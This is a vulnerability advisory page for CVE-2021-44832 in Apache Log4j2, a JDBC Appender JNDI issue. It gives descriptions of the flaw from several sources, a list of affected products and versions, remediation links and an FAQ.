CVE-2021-44832: Apache log4j2 log messages substitution (CVE-2021-44228)

Published Dec 12, 2021
·
Updated

Apache Log4j <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled (CVE-2021-44228).

Other sources

Apache Log4j could allow a remote attacker with permission to modify the logging configuration file to execute arbitrary code on the system. By constructing a malicious configuration using a JDBC Appender with a data source referencing a JNDI URI , an attacker could exploit this vulnerability to execute remote code.

IBM

Apache Log4j2 versions 2.0-beta7 through 2.17.0 (excluding security fix releases 2.3.2 and 2.12.4) are vulnerable to a remote code execution (RCE) attack when a configuration uses a JDBC Appender with a JNDI LDAP data source URI when an attacker has control of the target LDAP server. This issue is fixed by limiting JNDI data source names to the java protocol in Log4j2 versions 2.17.1, 2.12.4, and 2.3.2.

Apache Log4j2 versions 2.0-beta7 through 2.17.0 (excluding security fix releases 2.3.2 and 2.12.4) are vulnerable to a remote code execution (RCE) attack where an attacker with permission to modify the logging configuration file can construct a malicious configuration using a JDBC Appender with a data source referencing a JNDI URI which can execute remote code. This issue is fixed by limiting JNDI data source names to the java protocol in Log4j2 versions 2.17.1, 2.12.4, and 2.3.2.

Apache Log4j2 versions 2.0-beta7 through 2.17.0 (excluding security fix releases 2.3.2 and 2.12.4) are vulnerable to an attack where an attacker with permission to modify the logging configuration file can construct a malicious configuration using a JDBC Appender with a data source referencing a JNDI URI which can execute remote code. This issue is fixed by limiting JNDI data source names to the java protocol in Log4j2 versions 2.17.1, 2.12.4, and 2.3.2.

Affected packages Only the org.apache.logging.log4j:log4j-core package is directly affected by this vulnerability. The org.apache.logging.log4j:log4j-api should be kept at the same version as the org.apache.logging.log4j:log4j-core package to ensure compatability if in use.

This issue does not impact default configurations of Log4j2 and requires an attacker to have control over the Log4j2 configuration, which reduces the likelihood of being exploited.

GitHub

Affected Software

71 affected componentsFixes available
redhat/eap7-log4j<0:2.17.1-1.redhat_00001.1.el8ea
0:2.17.1-1.redhat_00001.1.el8ea
redhat/eap7-log4j<0:2.17.1-1.redhat_00001.1.el7ea
0:2.17.1-1.redhat_00001.1.el7ea
redhat/log4j<2.17.1
2.17.1
redhat/log4j<2.12.4
2.12.4
redhat/log4j<2.3.2
2.3.2
Apache Log4j=2.0-beta9
Apache Log4j=2.15.0
Apache Log4j=2.17.0
Apache Log4j=1.2.x
Apache Log4j>=2.0.1<2.3.2
Apache Log4j>=2.4<2.12.4
Apache Log4j>=2.13.0<2.17.1
Apache Log4j=2.0
Apache Log4j=2.0-beta7
Apache Log4j=2.0-beta8
Apache Log4j=2.0-beta9
Apache Log4j=2.0-rc1
Apache Log4j=2.0-rc2
Oracle Communications Diameter Signaling Router>=8.0.0.0<=8.5.1.0
Oracle Communications Interactive Session Recorder=6.3
Oracle Communications Interactive Session Recorder=6.4
Oracle Primavera Gateway>=17.12.0<=17.12.11
Oracle Primavera Gateway>=18.8.0<=18.8.13
Oracle Primavera Gateway>=19.12.0<=19.12.12
Oracle Primavera Gateway>=20.12.0<=20.12.7
Oracle Primavera Gateway=21.12.0
Oracle Primavera P6 Enterprise Project Portfolio Management>=19.12.0<=19.12.18.0
Oracle Primavera P6 Enterprise Project Portfolio Management>=20.12.0.0<=20.12.12.0
Oracle Primavera P6 Enterprise Project Portfolio Management=21.12.0.0
Oracle Primavera Unifier=18.8
Oracle Primavera Unifier=19.12
Oracle Primavera Unifier=20.12
Oracle Primavera Unifier=21.12
Oracle Retail Assortment Planning=16.0.3
Oracle Retail Fiscal Management=14.2
Oracle Siebel UI Framework=21.12
Oracle WebLogic Server=12.2.1.3.0
Oracle WebLogic Server=12.2.1.4.0
Oracle WebLogic Server=14.1.1.0.0
Cisco Cloudcenter=4.10.0.16
Fedoraproject Fedora=34
Fedoraproject Fedora=35
Debian Debian Linux=9.0
Oracle Communications Brm - Elastic Charging Engine<12.0.0.4.6
Oracle Communications Brm - Elastic Charging Engine=12.0.0.5.0
Oracle Communications Diameter Signaling Router>=8.3.0.0<=8.5.1.0
Oracle Communications Offline Mediation Controller<12.0.0.4.4
Oracle Communications Offline Mediation Controller=12.0.0.5.0
Oracle FLEXCUBE Private Banking=12.1.0
Oracle Health Sciences Data Management Workbench=2.5.2.1
Oracle Health Sciences Data Management Workbench=3.0.0.0
Oracle Health Sciences Data Management Workbench=3.1.0.3
Oracle Policy Automation>=12.2.0<=12.2.24
Oracle Policy Automation For Mobile Devices>=12.2.0<=12.2.24
Oracle Primavera P6 Enterprise Project Portfolio Management>=19.12.0.0<=19.12.18.0
Oracle Product Lifecycle Analytics=3.6.1
Oracle Retail Order Broker=18.0
Oracle Retail Order Broker=19.1
Oracle Retail Xstore Point of Service=17.0.4
Oracle Retail Xstore Point of Service=18.0.3
Oracle Retail Xstore Point of Service=19.0.2
Oracle Retail Xstore Point of Service=20.0.1
Oracle Retail Xstore Point of Service=21.0.1
Oracle Siebel UI Framework<=21.12
maven/org.ops4j.pax.logging:pax-logging-log4j2>=2.0.0<2.0.14
2.0.14
maven/org.ops4j.pax.logging:pax-logging-log4j2>=1.11.0<1.11.13
1.11.13
maven/org.ops4j.pax.logging:pax-logging-log4j2>=1.10.0<1.10.9
1.10.9
maven/org.ops4j.pax.logging:pax-logging-log4j2>=1.8.0<1.9.2
1.9.2
maven/org.apache.logging.log4j:log4j-core>=2.13.0<2.17.1
2.17.1
maven/org.apache.logging.log4j:log4j-core>=2.4<2.12.4
2.12.4
maven/org.apache.logging.log4j:log4j-core>=2.0-beta7<2.3.2
2.3.2

Remediation

Patch Available

https://issues.apache.org/jira/browse/LOG4J2-3293

Patch Available

https://www.oracle.com/security-alerts/cpuapr2022.html

Patch Available

https://www.oracle.com/security-alerts/cpujan2022.html

Patch Available

https://www.oracle.com/security-alerts/cpujul2022.html

Information

As per upstream: - In prior releases confirm that if the JDBC Appender is being used it is not configured to use any protocol other than Java. - Note that only the log4j-core JAR file is impacted by this vulnerability. Applications using only the log4j-api JAR file without the log4j-core JAR file are not impacted by this vulnerability.

Event History

Dec 12, 2021
Advisory Published
via FortiGuard·12:00 AM
Data Sourced
via FortiGuard·12:00 AM
DescriptionSeverityWeaknessAffected Software
Dec 28, 2021
CVE Published
12:00 AM
CVE Published
via MITRE·07:35 PM
Data Sourced
via MITRE·07:35 PM
DescriptionWeakness
Data Sourced
via Red Hat·07:58 PM
DescriptionSeverityAffected Software
Data Sourced
via NVD·08:15 PM
RemedyDescriptionSeverityWeaknessAffected Software
Jan 4, 2022
Advisory Published
via GitHub·04:14 PM
Feb 18, 2022
Data Sourced
via IBM·12:00 AM
DescriptionSeverityAffected Software
Dec 10, 2023
News Published
03:35 PM
Dec 11, 2023
News Published
03:01 PM

Parent advisories

This vulnerability appears in the following advisories.

Peer vulnerabilities

Found alongside the following vulnerabilities.

Free Weekly Intel

Don't miss critical vulnerabilities

Join thousands of security professionals who receive our weekly digest of trending CVEs, zero-days, and exploited vulnerabilities.

No spam. Unsubscribe anytime.

Frequently Asked Questions

1

What is CVE-2021-44832?

CVE-2021-44832 is a vulnerability in Apache Log4j2 versions 2.0-beta7 through 2.17.0 (excluding security fix releases 2.3.2 and 2.12.4) that allows a remote code execution (RCE) attack.

2

How severe is CVE-2021-44832?

CVE-2021-44832 has a severity rating of medium (6.6).

3

Which software versions of Apache Log4j2 are affected by CVE-2021-44832?

Apache Log4j2 versions 2.0-beta7 through 2.17.0 (excluding security fix releases 2.3.2 and 2.12.4) are affected by CVE-2021-44832.

4

How can I fix CVE-2021-44832?

To fix CVE-2021-44832, upgrade to version 2.17.1 of Apache Log4j2.

5

What is the CWE category of CVE-2021-44832?

CVE-2021-44832 falls under CWE category 20.

Company

Resources

Contact

SecAlerts Pty Ltd.
132 Wickham Terrace
Fortitude Valley,
QLD 4006, Australia
info@secalerts.co
By using SecAlerts services, you agree to our services end-user license agreement. This website is safeguarded by reCAPTCHA and governed by the Google Privacy Policy and Terms of Service. All names, logos, and brands of products are owned by their respective owners, and any usage of these names, logos, and brands for identification purposes only does not imply endorsement. If you possess any content that requires removal, please get in touch with us.
© 2026 SecAlerts Pty Ltd.
ABN: 70 645 966 203, ACN: 645 966 203